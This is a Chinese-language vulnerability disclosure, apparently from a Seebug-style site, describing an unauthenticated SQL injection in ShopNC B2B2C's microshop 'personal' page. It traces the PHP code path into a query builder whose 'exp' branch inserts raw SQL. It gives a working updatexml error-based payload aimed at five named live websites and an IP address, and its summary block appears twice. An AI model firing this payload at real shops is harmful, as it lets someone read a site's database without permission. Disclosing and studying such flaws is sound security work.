VULHUB ™

### 简要描述： 无需登录直接出数据 ### 详细说明： 为了节省审核时间，先来五个实例 ``` http://www.xiu365.cn/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://www.xiu365.cn/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://o.oular.com/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://121.42.141.67/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://m.qthtbw.com/modules/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` 看到 E:/wamp/www/shopnc B2B2C/modules/microshop/control/personal.php ``` public function listOp() { $model_class = Model('micro_personal_class'); $class_list = $model_class->getList(TRUE,NULL,'class_sort asc'); Tpl::output('class_list',$class_list);...

### 简要描述： 无需登录直接出数据 ### 详细说明： 为了节省审核时间，先来五个实例 ``` http://www.xiu365.cn/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://www.xiu365.cn/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://o.oular.com/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://121.42.141.67/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://m.qthtbw.com/modules/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` 看到 E:/wamp/www/shopnc B2B2C/modules/microshop/control/personal.php ``` public function listOp() { $model_class = Model('micro_personal_class'); $class_list = $model_class->getList(TRUE,NULL,'class_sort asc'); Tpl::output('class_list',$class_list); $condition = array(); if(isset($_GET['keyword'])) { $condition['commend_message'] = array('like','%'.$_GET['keyword'].'%'); } if(isset($_GET['class_id'])&&!empty($_GET['class_id'])) { $condition['class_id'] = $_GET['class_id']; } $order = 'microshop_sort asc,commend_time desc'; if($_GET['order'] == 'hot') { $order = 'microshop_sort asc,click_count desc'; } self::get_personal_list($condition,$order); Tpl::output('html_title',Language::get('nc_microshop_personal').'-'.Language::get('nc_microshop').'-'.C('site_name')); Tpl::showpage('personal_list'); } ``` 然后跟进get_personal_list ``` protected function get_personal_list( $condition, $order = "commend_time desc" ) { $model_personal = model( "micro_personal" ); $page_number = 35; $field = "micro_personal.*,member.member_name,member.member_avatar"; $list = $model_personal->getListWithUserInfo( $condition, $page_number, $order, $field ); Tpl::output( "show_page", $model_personal->showpage( 2 ) ); Tpl::output( "list", $list ); } ``` 然后继续跟进getListWithUserInfo ``` public function getListWithUserInfo($condition,$page='',$order='',$field='*',$limit=''){ $on = 'micro_personal.commend_member_id = member.member_id'; $result = $this->table('micro_personal,member')->field($field)->join('left')->on($on)->where($condition)->page($page)->order($order)->limit($limit)->select(); return $result; } ``` 然后跟进可以看到这个函数parseWhereItem ``` protected function parseWhereItem( $key, $val ) { $whereStr = ""; if ( is_array( $val ) ) { if ( is_string( $val[0] ) ) { if ( preg_match( "/^(EQ|NEQ|GT|EGT|LT|ELT|NOTLIKE|LIKE)\$/i", $val[0] ) ) { $whereStr .= $key." ".$this->comparison[strtolower( $val[0] )]." ".$this->parseValue( $val[1] ); return $whereStr; } if ( "exp" == strtolower( $val[0] ) ) { $whereStr .= " (".$key." ".$val[1].") "; return $whereStr; } if ( preg_match( "/IN/i", $val[0] ) ) { if ( isset( $val[2] ) && "exp" == $val[2] ) { $whereStr .= $key." ".strtoupper( $val[0] )." ".$val[1]; return $whereStr; } if ( empty( $val[1] ) ) { $whereStr .= $key." ".strtoupper( $val[0] )."('')"; return $whereStr; } if ( is_string( $val[1] ) ) { $val[1] = explode( ",", $val[1] ); $zone = implode( ",", $this->parseValue( $val[1] ) ); $whereStr .= $key." ".strtoupper( $val[0] )." (".$zone.")"; return $whereStr; } if ( is_array( $val[1] ) ) { $zone = implode( ",", $this->parseValue( $val[1] ) ); $whereStr .= $key." ".strtoupper( $val[0] )." (".$zone.")"; return $whereStr; } } else if ( preg_match( "/BETWEEN/i", $val[0] ) ) { $data = is_string( $val[1] ) ? explode( ",", $val[1] ) : $val[1]; $whereStr .= " (".$key." ".strtoupper( $val[0] )." ".$this->parseValue( $data[0] )." AND ".$this->parseValue( $data[1] )." )"; return $whereStr; } else { $error = "Model Error: args ".$val[0]." is error!"; throw_exception( $error ); return $whereStr; } } else { $count = count( $val ); if ( in_array( strtoupper( trim( $val[$count - 1] ) ), array( "AND", "OR", "XOR" ) ) ) { $rule = strtoupper( trim( $val[$count - 1] ) ); $count -= 1; } else { $rule = "AND"; } $i = 0; for ( ;$i < $count;++$i) { $data = is_array( $val[$i] ) ? $val[$i][1] : $val[$i]; if ( "exp" == strtolower( $val[$i][0] ) ) { $whereStr .= "(".$key." ".$data.") ".$rule." "; } else { $op = is_array( $val[$i] ) ? $this->comparison[strtolower( $val[$i][0] )] : "="; $whereStr .= "(".$key." ".$op." ".$this->parseValue( $data ).") ".$rule." "; } } $whereStr = substr( $whereStr, 0, -4 ); return $whereStr; } } else { $whereStr .= $key." = ".$this->parseValue( $val ); } return $whereStr; } ``` 如果我们传入一个数组然后val[0]=exp，其中val[1]可以写任意的sql语句。 根据以上的信息我们可以看到$condition其实是GET传进去的，我们可以传一个数组。然后构造以下exp ``` index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` [<img src="https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png" alt="QQ截图20150702194117.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png" alt="QQ截图20150702194117.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png)